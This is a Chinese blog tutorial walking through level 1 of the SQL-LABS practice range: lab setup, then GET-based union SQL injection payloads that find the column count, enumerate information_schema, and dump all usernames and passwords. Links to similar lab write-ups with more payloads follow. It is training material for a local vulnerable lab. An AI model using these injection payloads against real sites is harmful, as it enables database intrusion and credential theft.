SQL注入入门攻略 SQL-LABS靶场 第1关 基于GET请求方式注入 ~

最新推荐文章于 2025-04-06 09:02:08 发布
最新推荐文章于 2025-04-06 09:02:08 发布
阅读量663 收藏 3
点赞数
分类专栏: 网络安全 网络空间安全 SQL注入 文章标签: 网络安全 sql mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42560204/article/details/125513027
版权
本文指导如何搭建Sql-labs靶场环境,通过一步步实践,掌握SQL注入技巧,包括注入点判断、类型识别、列数查找、数据回显、用户权限获取、表名和字段查询,最终获取root权限和用户数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先是环境搭建-点击下载

下载好后 打开PhpStudy启动apache和mysql

设置网站根目录指向保存的sql-labs目录

 

修改sql-labs数据库连接配置文件

在sql-labs目录下的sql-connections/db-creds.inc文件

改为自己实际的mysql账号和密码 默认为root/root

 

启用网站 (我的网站端口是8091)

访问http://127.0.0.1:8091  页面打开效果图

 

安装security数据库点击页面中 Setup/reset Database for labs

 

至此 sql-labs靶场环境搭建完成

点击选择关卡

 

  • LESS-1

1.判断有无注入点

        uri上拼接        

        ?id=1'

        返回报错 证明有注入点

2.判断注入类型 利用--+注释(用%23替换也可以 %23代表#符号 直接写#符号是不行的 会被浏览器认为是锚链接) 注掉语句后面的sql 

        ?id=1 and 1=2--+        正常返回

        ?id=1' and 1=2--+        无返回

        无返回证明类型为字符型注入

3.利用order by查找列数量

        ?id=1' order by 1--+        正常执行

        ?id=1' order by 2--+        正常执行

        ?id=1' order by 3--+        正常执行

        ?id=1' order by 4--+        报错 Unknown column '4' in 'order clause'

        说明表中只有3列

4.利用union拼接sql 查看回显点 id改为-1(-1不是固定写法,只是为了使其查不到数据而显示我们的sql数据)

        ?id=-1' union select 1,2,3--+

        

        回显点为第二列和第三列的字段

5.查看用户和数据库名

        ?id=-1' union select 1,user(),database()--+

        

         发现为root,可高权限注入

6.利用系统库information_schema库查出security所有表名和表字段名

        ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+

        

         查出四个表,接下来查询users表字段

        ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

        

         查出字段为 id,username,password

7.查询出所有账号密码,结束

        现在我们拿到的数据有:

                用户: root

                数据库: scurity

                表: users

                字段: id,username,password

        构建注入语句

        ?id=-1' union select 1,2,(select group_concat('账号:',username,' 密码:',password) from users)--+

        

 

通过学习第一关的过关方法,想必小伙伴们已经初步掌握了SQL注入相关的一些技巧~

前4关的关卡大同小异,小伙伴们可以自己尝试过关 加深印象~

 

sqli-labs靶场第一关
A_450的博客
12-12 1182
sqli-labs靶场第一关
1day】sqli-labs靶场第一关基础个人详解
zadaSS的博客
10-19 2193
新手入门的自我记录
Sql注入(靶场)第一关
m0_68706634的博客
12-02 758
其中,information_schma数据库中tables表就存了所有表的名字,其中table_name对应表名,而table_schema对应这个表在哪个库(information_schma数据库中还有一个叫columns的表,记录了所有表中列名的数据)id=1' order by 3 --+ (--+的作用是将代码后面的LIMIT 0,1'';id=1' and '1'='2' union select 1,2,3 --+访问:http://ip地址/sqlilab/Less-1/?
Xss-labs靶场1-10
最新发布
tengyuehou的博客
04-06 918
①、输入name=123456,按f12查看得知这是h2标记②、 利用所学的JavaScript知识,构造payload。
网络安全04-sql注入靶场第一关
m0_68976043的博客
01-28 2436
sql注入环境,这个环境网上很多教程,其大部分基本都是小皮面板加漏洞环境放在WWW目录下,搜一下很容易就搭建出来了,这里就不详细讲述了,最后搭建下来的图片如图所示。
SQL注入GET型(search)
qq_48335646的博客
05-28 754
0x01:测试分析 我们进行测试这里是否存在SQL注入漏洞 输入a' 点击搜索后 报错了,说明很大可能存在SQL注入漏洞了。 0x02:爆字段(字段就是这个数据表中的列) order by 语句 输入 a' order by 1 # 输入a' order by 7# 输入a' order by 8# 由此可以判断出,库中有8张表。 0x03:爆数据库名 使用联合查询注入union 输入a' union select 1,2,3,4,5,6,7# 可以.
Sql-labs 靶场搭建及通
ming20211016的博客
11-07 3360
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。mysql_real_escape_string函数,宽字节注⼊,符号绕过,联合注⼊。没⽤禁⽤or,and,但过滤了select和union,可以⽤⼤⼩写和重写进⾏绕过。
sqli-labs-master靶场
09-21
此外,sqli-labs-master靶场不仅仅局限于单一类型的SQL注入,它还包含了一系列不同的挑战,比如基于GET和POST请求的注入点、多层查询的注入、错误信息控制和条件注入等。这些挑战旨在提高用户对于SQL注入漏洞识别的...
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1262
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
Sqli-labs靶场11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1824
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1974
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql-labs靶场第一关测试报告
ccc_9wy的博客
09-26 1407
完整详细测试sql-labs靶场第一关; 测试get型的sql注入,联合查询注入出数据库中的用户名和密码; 使用sqlmap爆破,熟悉sqlmap的参数。
sql labs靶场——第一关
m0_74412122的博客
07-29 1307
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+id=1'and updatexml(1,concat('~',(database()),'~'),1)--+查看user表中的username这一列的值。查看user表中的username这一列的值。查看user表中的密码这一列的值。查看user表中的密码这一列的值。
sqli-labs靶场第一关
weixin_57240513的博客
07-22 231
第一步:判断是否存在sql注入判断为字符型 判断有几列,使用order by得出有3列 union select 联合查询查看回显位置 使用内置库语句查询数据库名 输入:http://127.0.0.1/Less-1/?id=-1' union select 1,database(),3 --+ 接着就可以使用内置库语句接着查询下面的表名、列名、字段名了,语句如下 http://127.0.0.1/Less-1/?id=-1' union selec
sql-labs靶场练习第一关
cz_071017的博客
09-25 871
id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+)来查看他的字段。通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。根据表名知道可能用户的账户和密码是在users表中接下来我们就是得到该表下的字段名以及内容。1.字符型注入&数字型注入&搜索型注入。可以将SQL注入分为两大类。
SQl注入靶场sqli——第一关
狸匪的博客
01-22 1869
在浏览器中 使用?id=1’–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句。 接下来是在闭合中添加语句执行我们想要的命令 使用 order by 查询所有字段,查询到4的时候报错,说明此表只有三个字段 直接在数据库中查询方式: 接下来使用联合查询的方式 union select 1,2,3 因为上一步爆出是三个字段,所以1,2,3 在网页中只看到了第一个元组(也就是第一行)的数据,但是在数据库中直接查询却有两个元组的数据。 尝试修改
SQL注入实战系列之sqli靶场第一关
VVzv的博客
08-27 2283
Sqli-less1: 打开sqli环境第一关(Less-1): 在链接Less-1/后面添加?id=1,然后回车即可; 添加?id=1后发现有了新的内容,在id=1后面加个单引号(')查看返回的内容; 发现返回了SQL语句的报错信息,从这个界面报错中可以得知这里是存在注入(现实中基本不会返回信息,这个我们将在后面接触),此处的id参数满足注入攻击的两个条件,id的参数用户可以控制,并且这个...
SQL注入GET
qq_51393133的博客
09-11 1572
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
掌握全面SQL注入技巧:sqli-labs靶场深度学习
SQL注入攻击是一种常见的网络攻击技术,攻击者通过在Web表单输入或通过URL查询参数的方式注入恶意SQL代码,试图控制或非法访问后端数据库,以窃取、篡改或删除数据,或者对数据库系统进行其他恶意操作。 描述中列举...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值